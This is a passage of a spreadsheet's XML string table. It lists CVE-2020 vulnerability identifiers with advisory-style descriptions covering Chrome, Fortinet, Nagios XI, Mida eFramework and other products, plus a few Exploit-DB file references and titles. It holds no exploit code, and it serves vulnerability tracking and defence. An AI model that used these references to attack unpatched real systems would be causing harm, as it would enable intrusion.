    <t>A memory corruption issue was found in Artifex Ghostscript 9.50 and 9.52. Use of a non-standard PostScript operator can allow overriding of file access controls. The 'rsearch' calculation for the 'post' size resulted in a size that was too large, and could underflow to max uint32_t. This was fixed in commit 5d499272b95a6b890a1397e11d20937de000d31b.</t>
  </si>
  <si>
    <t>CVE-2020-15901</t>
  </si>
  <si>
    <t>In Nagios XI before 5.7.3, ajaxhelper.php allows remote authenticated attackers to execute arbitrary commands via cmdsubsys.</t>
  </si>
  <si>
    <t>CVE-2020-15902</t>
  </si>
  <si>
    <t>Graph Explorer in Nagios XI before 5.7.2 allows XSS via the link url option.</t>
  </si>
  <si>
    <t>CVE-2020-15903</t>
  </si>
  <si>
    <t>An issue was found in Nagios XI before 5.7.3. There is a privilege escalation vulnerability in backend scripts that ran as root where some included files were editable by nagios user. This issue was fixed in version 5.7.3.</t>
  </si>
  <si>
    <t>CVE-2020-15904</t>
  </si>
  <si>
    <t>A buffer overflow in the patching routine of bsdiff4 before 1.2.0 allows an attacker to write to heap memory (beyond allocated bounds) via a crafted patch file.</t>
  </si>
  <si>
    <t>CVE-2020-15906</t>
  </si>
  <si>
    <t>tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.</t>
  </si>
  <si>
    <t>CVE-2020-15907</t>
  </si>
  <si>
    <t>In Mahara 19.04 before 19.04.6, 19.10 before 19.10.4, and 20.04 before 20.04.1, certain places could execute file or folder names containing JavaScript.</t>
  </si>
  <si>
    <t>CVE-2020-15908</t>
  </si>
  <si>
    <t>tar/TarFileReader.cpp in Cauldron cbang (aka C-Bang or C!) before 1.6.0 allows Directory Traversal during extraction from a TAR archive.</t>
  </si>
  <si>
    <t>CVE-2020-15909</t>
  </si>
  <si>
    <t>SolarWinds N-central through 2020.1 allows session hijacking and requires user interaction or physical access. The N-Central JSESSIONID cookie attribute is not checked against multiple sources such as sourceip, MFA claim, etc. as long as the victim stays logged in within N-Central. To take advantage of this, cookie could be stolen and the JSESSIONID can be captured. On its own this is not a surprising result; low security tools allow the cookie to roam from machine to machine. The JSESSION cookie can then be used on the attackers’ workstation by browsing to the victim’s NCentral server URL and replacing the JSESSIONID attribute value by the captured value. Expected behavior would be to check this against a second source and enforce at least a reauthentication or multi factor request as N-Central is a highly privileged service.</t>
  </si>
  <si>
    <t>CVE-2020-1591</t>
  </si>
  <si>
    <t>CVE-2020-15910</t>
  </si>
  <si>
    <t>SolarWinds N-Central version 12.3 GA and lower does not set the JSESSIONID attribute to HTTPOnly. This makes it possible to influence the cookie with javascript. An attacker could send the user to a prepared webpage or by influencing JavaScript to the extract the JESSIONID. This could then be forwarded to the attacker.</t>
  </si>
  <si>
    <t>CVE-2020-15912</t>
  </si>
  <si>
    <t>** DISPUTED ** Tesla Model 3 vehicles allow attackers to open a door by leveraging access to a legitimate key card, and then using NFC Relay. NOTE: the vendor has developed Pin2Drive to mitigate this issue.</t>
  </si>
  <si>
    <t>CVE-2020-15914</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability exists in the Origin Client for Mac and PC 10.5.86 or earlier that could allow a remote attacker to execute arbitrary Javascript in a target user’s Origin client. An attacker could use this vulnerability to access sensitive data related to the target user’s Origin account, or to control or monitor the Origin text chat window.</t>
  </si>
  <si>
    <t>CVE-2020-15916</t>
  </si>
  <si>
    <t>goform/AdvSetLanip endpoint on Tenda AC15 AC1900 15.03.05.19 devices allows remote attackers to execute arbitrary system commands via shell metacharacters in the lanIp POST parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15917</t>
  </si>
  <si>
    <t>common/session.c in Claws Mail before 3.17.6 has a protocol violation because suffix data after STARTTLS is mishandled.</t>
  </si>
  <si>
    <t>CVE-2020-15918</t>
  </si>
  <si>
    <t>Multiple Stored Cross Site Scripting (XSS) vulnerabilities were discovered in Mida eFramework through 2.9.0.</t>
  </si>
  <si>
    <t>CVE-2020-15919</t>
  </si>
  <si>
    <t>A Reflected Cross Site Scripting (XSS) vulnerability was discovered in Mida eFramework through 2.9.0.</t>
  </si>
  <si>
    <t>CVE-2020-1592</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.To exploit this vulnerability, an authenticated attacker could run a specially crafted application, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0928, CVE-2020-1033, CVE-2020-1589, CVE-2020-16854.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48768.py</t>
  </si>
  <si>
    <t>Mida eFramework 2.9.0 - Remote Code Execution</t>
  </si>
  <si>
    <t>2020-08-27</t>
  </si>
  <si>
    <t>CVE-2020-15920</t>
  </si>
  <si>
    <t>There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required.</t>
  </si>
  <si>
    <t>CVE-2020-15921</t>
  </si>
  <si>
    <t>Mida eFramework through 2.9.0 has a back door that permits a change of the administrative password and access to restricted functionalities, such as Code Execution.</t>
  </si>
  <si>
    <t>CVE-2020-15922</t>
  </si>
  <si>
    <t>There is an OS Command Injection in Mida eFramework 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. Authentication is required.</t>
  </si>
  <si>
    <t>CVE-2020-15923</t>
  </si>
  <si>
    <t>Mida eFramework through 2.9.0 allows unauthenticated ../ directory traversal.</t>
  </si>
  <si>
    <t>CVE-2020-15924</t>
  </si>
  <si>
    <t>There is a SQL Injection in Mida eFramework through 2.9.0 that leads to Information Disclosure. No authentication is required. The injection point resides in one of the authentication parameters.</t>
  </si>
  <si>
    <t>CVE-2020-15925</t>
  </si>
  <si>
    <t>A SQL injection vulnerability at a tpf URI in Loway QueueMetrics before 19.10.21 allows remote authenticated attackers to execute arbitrary SQL commands via the TPF_XPAR1 parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15926</t>
  </si>
  <si>
    <t>Rocket.Chat through 3.4.2 allows XSS where an attacker can send a specially crafted message to a channel or in a direct message to the client which results in remote code execution on the client side.</t>
  </si>
  <si>
    <t>CVE-2020-15927</t>
  </si>
  <si>
    <t>Zoho ManageEngine Applications Manager version 14740 and prior allows an authenticated SQL Injection via a crafted jsp request in the SAP module.</t>
  </si>
  <si>
    <t>CVE-2020-15928</t>
  </si>
  <si>
    <t>In Ortus TestBox 2.4.0 through 4.1.0, unvalidated query string parameters to test-browser/index.cfm allow directory traversal.</t>
  </si>
  <si>
    <t>CVE-2020-15929</t>
  </si>
  <si>
    <t>In Ortus TestBox 2.4.0 through 4.1.0, unvalidated query string parameters passed to system/runners/HTMLRunner.cfm allow an attacker to write an arbitrary CFM file (within the application's context) containing attacker-defined CFML tags, leading to Remote Code Execution.</t>
  </si>
  <si>
    <t>CVE-2020-1593</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Windows Media Audio Decoder improperly handles objects, aka 'Windows Media Audio Decoder Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1508.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48837.txt</t>
  </si>
  <si>
    <t>Joplin 1.0.245 - Arbitrary Code Execution (PoC)</t>
  </si>
  <si>
    <t>2020-09-28</t>
  </si>
  <si>
    <t>CVE-2020-15930</t>
  </si>
  <si>
    <t>An XSS issue in Joplin desktop 1.0.190 to 1.0.245 allows arbitrary code execution via a malicious HTML embed tag.</t>
  </si>
  <si>
    <t>CVE-2020-15931</t>
  </si>
  <si>
    <t>Netwrix Account Lockout Examiner before 5.1 allows remote attackers to capture the Net-NTLMv1/v2 authentication challenge hash of the Domain Administrator (that is configured within the product in its installation state) by generating a single Kerberos Pre-Authentication Failed (ID 4771) event on a Domain Controller.</t>
  </si>
  <si>
    <t>CVE-2020-15932</t>
  </si>
  <si>
    <t>Overwolf before 0.149.2.30 mishandles Symbolic Links during updates, causing elevation of privileges.</t>
  </si>
  <si>
    <t>CVE-2020-15933</t>
  </si>
  <si>
    <t>A exposure of sensitive information to an unauthorized actor in Fortinet FortiMail versions 6.0.9 and below, FortiMail versions 6.2.4 and below FortiMail versions 6.4.1 and 6.4.0 allows attacker to obtain potentially sensitive software-version information via client-side resources inspection.</t>
  </si>
  <si>
    <t>CVE-2020-15935</t>
  </si>
  <si>
    <t>A cleartext storage of sensitive information in GUI in FortiADC versions 5.4.3 and below, 6.0.0 and below may allow a remote authenticated attacker to retrieve some sensitive information such as users LDAP passwords and RADIUS shared secret by deobfuscating the passwords entry fields.</t>
  </si>
  <si>
    <t>CVE-2020-15936</t>
  </si>
  <si>
    <t>A improper input validation in Fortinet FortiGate version 6.4.3 and below, version 6.2.5 and below, version 6.0.11 and below, version 5.6.13 and below allows attacker to disclose sensitive information via SNI Client Hello TLS packets.</t>
  </si>
  <si>
    <t>CVE-2020-15937</t>
  </si>
  <si>
    <t>An improper neutralization of input vulnerability in FortiGate version 6.2.x below 6.2.5 and 6.4.x below 6.4.1 may allow a remote attacker to perform a stored cross site scripting attack (XSS) via the IPS and WAF logs dashboard.</t>
  </si>
  <si>
    <t>CVE-2020-15938</t>
  </si>
  <si>
    <t>When traffic other than HTTP/S (eg: SSH traffic, etc...) traverses the FortiGate in version below 6.2.5 and below 6.4.2 on port 80/443, it is not redirected to the transparent proxy policy for processing, as it doesn't have a valid HTTP header.</t>
  </si>
  <si>
    <t>CVE-2020-15939</t>
  </si>
  <si>
    <t>An improper access control vulnerability (CWE-284) in FortiSandbox versions 3.2.1 and below and 3.1.4 and below may allow an authenticated, unprivileged attacker to download the device configuration file via the recovery URL.</t>
  </si>
  <si>
    <t>CVE-2020-1594</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1193, CVE-2020-1332, CVE-2020-1335.</t>
  </si>
  <si>
    <t>CVE-2020-15940</t>
  </si>
  <si>
    <t>An improper neutralization of input vulnerability [CWE-79] in FortiClientEMS versions 6.4.1 and below and 6.2.9 and below may allow a remote authenticated attacker to inject malicious script/tags via the name parameter of various sections of the server.</t>
  </si>
  <si>
    <t>CVE-2020-15941</t>
  </si>
  <si>
    <t>A path traversal vulnerability [CWE-22] in FortiClientEMS versions 6.4.1 and below; 6.2.8 and below may allow an authenticated attacker to inject directory traversal character sequences to add/delete the files of the server via the name parameter of Deployment Packages.</t>
  </si>
  <si>
    <t>CVE-2020-15942</t>
  </si>
  <si>
    <t>An information disclosure vulnerability in Web Vulnerability Scan profile of Fortinet's FortiWeb version 6.2.x below 6.2.4 and version 6.3.x below 6.3.5 may allow a remote authenticated attacker to read the password used by the FortiWeb scanner to access the device defined in the scan profile.</t>
  </si>
  <si>
    <t>CVE-2020-15943</t>
  </si>
  <si>
    <t>An issue was discovered in the Gantt-Chart module before 5.5.4 for Jira. Due to a missing privilege check, it is possible to read and write to the module configuration of other users. This can also be used to deliver an XSS payload to other users' dashboards. To exploit this vulnerability, an attacker has to be authenticated.</t>
  </si>
  <si>
    <t>CVE-2020-15944</t>
  </si>
  <si>
    <t>An issue was discovered in the Gantt-Chart module before 5.5.5 for Jira. Due to missing validation of user input, it is vulnerable to a persistent XSS attack. An attacker can embed the attack vectors in the dashboard of other users. To exploit this vulnerability, an attacker has to be authenticated.</t>
  </si>
  <si>
    <t>CVE-2020-15945</t>
  </si>
  <si>
    <t>Lua through 5.4.0 has a segmentation fault in changedline in ldebug.c (e.g., when called by luaG_traceexec) because it incorrectly expects that an oldpc value is always updated upon a return of the flow of control to a function.</t>
  </si>
  <si>
    <t>CVE-2020-15947</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in the qm_adm/qm_export_stats_run.do endpoint of Loway QueueMetrics before 19.10.21 allows remote authenticated users to execute arbitrary SQL commands via the exportId parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15948</t>
  </si>
  <si>
    <t>eGain Chat 15.5.5 allows XSS via the Name (aka full_name) field.</t>
  </si>
  <si>
    <t>CVE-2020-15949</t>
  </si>
  <si>
    <t>Immuta v2.8.2 is affected by one instance of insecure permissions that can lead to user account takeover.</t>
  </si>
  <si>
    <t>CVE-2020-1595</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft SharePoint where APIs aren't properly protected from unsafe data input, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1200, CVE-2020-1210, CVE-2020-1452, CVE-2020-1453, CVE-2020-1576.</t>
  </si>
  <si>
    <t>exploits/windows/dos/48731.py</t>
  </si>
  <si>
    <t>ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)</t>
  </si>
  <si>
    <t>2020-08-05</t>
  </si>
  <si>
    <t>CVE-2020-15950</t>
  </si>
  <si>
    <t>Immuta v2.8.2 is affected by improper session management: user sessions are not revoked upon logout.</t>
  </si>
  <si>
    <t>CVE-2020-15951</t>
  </si>
  <si>
    <t>Immuta v2.8.2 accepts user-supplied project names without properly sanitizing the input, allowing attackers to inject arbitrary HTML content that is rendered as part of the application. An attacker could leverage this to redirect application users to a phishing website in an attempt to steal credentials.</t>
  </si>
  <si>
    <t>CVE-2020-15952</t>
  </si>
  <si>
    <t>Immuta v2.8.2 is affected by stored XSS that allows a low-privileged user to escalate privileges to administrative permissions. Additionally, unauthenticated attackers can phish unauthenticated Immuta users to steal credentials or force actions on authenticated users through reflected, DOM-based XSS.</t>
  </si>
  <si>
    <t>CVE-2020-15953</t>
  </si>
  <si>
    <t>LibEtPan through 1.9.4, as used in MailCore 2 through 0.6.3 and other products, has a STARTTLS buffering issue that affects IMAP, SMTP, and POP3. When a server sends a "begin TLS" response, the client reads additional data (e.g., from a meddler-in-the-middle attacker) and evaluates it in a TLS context, aka "response injection."</t>
  </si>
  <si>
    <t>CVE-2020-15954</t>
  </si>
  <si>
    <t>KDE KMail 19.12.3 (aka 5.13.3) engages in unencrypted POP3 communication during times when the UI indicates that encryption is in use.</t>
  </si>
  <si>
    <t>CVE-2020-15955</t>
  </si>
  <si>
    <t>In s/qmail through 4.0.07, an active MitM can inject arbitrary plaintext commands into a STARTTLS encrypted session between an SMTP client and s/qmail. This allows e-mail messages and user credentials to be sent to the MitM attacker.</t>
  </si>
  <si>
    <t>CVE-2020-15956</t>
  </si>
  <si>
    <t>ActiveMediaServer.exe in ACTi NVR3 Standard Server 3.0.12.42 allows remote unauthenticated attackers to trigger a buffer overflow and application termination via a malformed payload.</t>
  </si>
  <si>
    <t>CVE-2020-15957</t>
  </si>
  <si>
    <t>An issue was discovered in DP3T-Backend-SDK before 1.1.1 for Decentralised Privacy-Preserving Proximity Tracing (DP3T). When it is configured to check JWT before uploading/publishing keys, it is possible to skip the signature check by providing a JWT token with alg=none.</t>
  </si>
  <si>
    <t>CVE-2020-15958</t>
  </si>
  <si>
    <t>An issue was discovered in 1CRM System through 8.6.7. An insecure direct object reference to internally stored files allows a remote attacker to access various sensitive information via an unauthenticated request with a predictable URL.</t>
  </si>
  <si>
    <t>CVE-2020-15959</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in networking in Google Chrome prior to 85.0.4183.102 allowed an attacker who convinced the user to enable logging to obtain potentially sensitive information from process memory via social engineering.</t>
  </si>
  <si>
    <t>CVE-2020-1596</t>
  </si>
  <si>
    <t>A information disclosure vulnerability exists when TLS components use weak hash algorithms, aka 'TLS Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15960</t>
  </si>
  <si>
    <t>Heap buffer overflow in storage in Google Chrome prior to 85.0.4183.121 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15961</t>
  </si>
  <si>
    <t>Insufficient policy validation in extensions in Google Chrome prior to 85.0.4183.121 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-15962</t>
  </si>
  <si>
    <t>Insufficient policy validation in serial in Google Chrome prior to 85.0.4183.121 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15963</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in extensions in Google Chrome prior to 85.0.4183.121 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-15964</t>
  </si>
  <si>
    <t>Insufficient data validation in media in Google Chrome prior to 85.0.4183.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15965</t>
  </si>
  <si>
    <t>Type confusion in V8 in Google Chrome prior to 85.0.4183.121 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15966</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in extensions in Google Chrome prior to 85.0.4183.121 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-15967</t>
  </si>
  <si>
    <t>Use after free in payments in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15968</t>
  </si>
  <si>
    <t>Use after free in Blink in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15969</t>
  </si>
  <si>
    <t>Use after free in WebRTC in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-1597</t>
  </si>
  <si>
    <t>CVE-2020-15970</t>
  </si>
  <si>
    <t>Use after free in NFC in Google Chrome prior to 86.0.4240.75 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15971</t>
  </si>
  <si>
    <t>Use after free in printing in Google Chrome prior to 86.0.4240.75 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15972</t>
  </si>
  <si>
    <t>Use after free in audio in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15973</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in extensions in Google Chrome prior to 86.0.4240.75 allowed an attacker who convinced a user to install a malicious extension to bypass same origin policy via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2020-15974</t>
  </si>
  <si>
    <t>Integer overflow in Blink in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to bypass site isolation via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15975</t>
  </si>
  <si>
    <t>Integer overflow in SwiftShader in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15976</t>
  </si>
  <si>
    <t>Use after free in WebXR in Google Chrome on Android prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15977</t>
  </si>
  <si>
    <t>Insufficient data validation in dialogs in Google Chrome on OS X prior to 86.0.4240.75 allowed a remote attacker to obtain potentially sensitive information from disk via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15978</t>
  </si>
  <si>
    <t>Insufficient data validation in navigation in Google Chrome on Android prior to 86.0.4240.75 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15979</t>
  </si>
  <si>
    <t>Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-1598</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory, aka 'Windows UPnP Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15980</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in Intents in Google Chrome on Android prior to 86.0.4240.75 allowed a local attacker to bypass navigation restrictions via crafted Intents.</t>
  </si>
  <si>
    <t>CVE-2020-15981</t>
  </si>
  <si>
    <t>Out of bounds read in audio in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15982</t>
  </si>
  <si>
    <t>Inappropriate implementation in cache in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15983</t>
  </si>
  <si>
    <t>Insufficient data validation in webUI in Google Chrome on ChromeOS prior to 86.0.4240.75 allowed a local attacker to bypass content security policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15984</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in Omnibox in Google Chrome on iOS prior to 86.0.4240.75 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-15985</t>
  </si>
  <si>
    <t>Inappropriate implementation in Blink in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to spoof security UI via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15986</t>
  </si>
  <si>
    <t>Integer overflow in media in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15987</t>
  </si>
  <si>
    <t>Use after free in WebRTC in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted WebRTC stream.</t>
  </si>
  <si>
    <t>CVE-2020-15988</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in downloads in Google Chrome on Windows prior to 86.0.4240.75 allowed a remote attacker who convinced the user to open files to execute arbitrary code via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15989</t>
  </si>
  <si>
    <t>Uninitialized data in PDFium in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted PDF file.</t>
  </si>
  <si>
    <t>CVE-2020-1599</t>
  </si>
  <si>
    <t>Windows Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-15990</t>
  </si>
  <si>
    <t>Use after free in autofill in Google Chrome prior to 86.0.4240.75 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15991</t>
  </si>
  <si>
    <t>Use after free in password manager in Google Chrome prior to 86.0.4240.75 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15992</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in networking in Google Chrome prior to 86.0.4240.75 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15993</t>
  </si>
  <si>
    <t>Use after free in printing in Google Chrome prior to 86.0.4240.99 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15994</t>
  </si>
  <si>
    <t>Use after free in V8 in Google Chrome prior to 86.0.4240.99 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15995</t>
  </si>
  <si>
    <t>Out of bounds write in V8 in Google Chrome prior to 86.0.4240.99 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15996</t>
  </si>
  <si>
    <t>Use after free in passwords in Google Chrome prior to 86.0.4240.99 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15997</t>
  </si>
  <si>
    <t>Use after free in Mojo in Google Chrome prior to 86.0.4240.99 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15998</t>
  </si>
  <si>
    <t>Use after free in USB in Google Chrome prior to 86.0.4240.99 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-15999</t>
  </si>
  <si>
    <t>Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-1600</t>
  </si>
  <si>
    <t>In a Point-to-Multipoint (P2MP) Label Switched Path (LSP) scenario, an uncontrolled resource consumption vulnerability in the Routing Protocol Daemon (RPD) in Juniper Networks Junos OS allows a specific SNMP request to trigger an infinite loop causing a high CPU usage Denial of Service (DoS) condition. This issue affects both SNMP over IPv4 and IPv6. This issue affects: Juniper Networks Junos OS: 12.3X48 versions prior to 12.3X48-D90; 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D200; 15.1X53 versions prior to 15.1X53-D238, 15.1X53-D592; 16.1 versions prior to 16.1R7-S5; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R3-S1; 17.2 versions prior to 17.2R3-S2; 17.3 versions prior to 17.3R3-S7; 17.4 versions prior to 17.4R2-S4, 17.4R3; 18.1 versions prior to 18.1R3-S5; 18.2 versions prior to 18.2R3; 18.2X75 versions prior to 18.2X75-D50; 18.3 versions prior to 18.3R2; 18.4 versions prior to 18.4R2; 19.1 versions prior to 19.1R2.</t>
  </si>
  <si>
    <t>CVE-2020-16000</t>
  </si>
  <si>
    <t>Inappropriate implementation in Blink in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16001</t>
  </si>
  <si>
    <t>Use after free in media in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16002</t>
  </si>
  <si>
    <t>Use after free in PDFium in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file.</t>
  </si>
  <si>
    <t>CVE-2020-16003</t>
  </si>
  <si>
    <t>Use after free in printing in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16004</t>
  </si>
  <si>
    <t>Use after free in user interface in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16005</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in ANGLE in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16006</t>
  </si>
  <si>
    <t>Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16007</t>
  </si>
  <si>
    <t>Insufficient data validation in installer in Google Chrome prior to 86.0.4240.183 allowed a local attacker to potentially elevate privilege via a crafted filesystem.</t>
  </si>
  <si>
    <t>CVE-2020-16008</t>
  </si>
  <si>
    <t>Stack buffer overflow in WebRTC in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit stack corruption via a crafted WebRTC packet.</t>
  </si>
  <si>
    <t>CVE-2020-16009</t>
  </si>
  <si>
    <t>CVE-2020-1601</t>
  </si>
  <si>
    <t>Certain types of malformed Path Computation Element Protocol (PCEP) packets when received and processed by a Juniper Networks Junos OS device serving as a Path Computation Client (PCC) in a PCEP environment using Juniper's path computational element protocol daemon (pccd) process allows an attacker to cause the pccd process to crash and generate a core file thereby causing a Denial of Service (DoS). Continued receipt of this family of malformed PCEP packets will cause an extended Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS: 15.1 versions prior to 15.1F6-S13, 15.1R7-S4; 15.1X49 versions prior to 15.1X49-D180 on SRX Series; 15.1X53 versions prior to 15.1X53-D238, 15.1X53-D496, 15.1X53-D592; 16.1 versions prior to 16.1R7-S4; 16.2 versions prior to 16.2R2-S9; 17.1 versions prior to 17.1R2-S11, 17.1R3; 17.2 versions prior to 17.2R1-S9; 17.2 version 17.2R2 and later prior to 17.2R3-S2; 17.3 versions prior to 17.3R3-S3; 17.4 versions prior to 17.4R2-S2, 17.4R3; 18.1 versions prior to 18.1R3-S2; 18.2 versions prior to 18.2R2-S6, 18.2R3; 18.2X75 versions prior to 18.2X75-D40; 18.3 versions prior to 18.3R2; 18.4 versions prior to 18.4R1-S2, 18.4R2. This issue does not affect releases of Junos OS prior to 15.1R1.</t>
  </si>
  <si>
    <t>CVE-2020-16010</t>
  </si>
  <si>
    <t>Heap buffer overflow in UI in Google Chrome on Android prior to 86.0.4240.185 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16011</t>
  </si>
  <si>
    <t>Heap buffer overflow in UI in Google Chrome on Windows prior to 86.0.4240.183 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2020-16012</t>
  </si>
  <si>
    <t>Side-channel information leakage in graphics in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
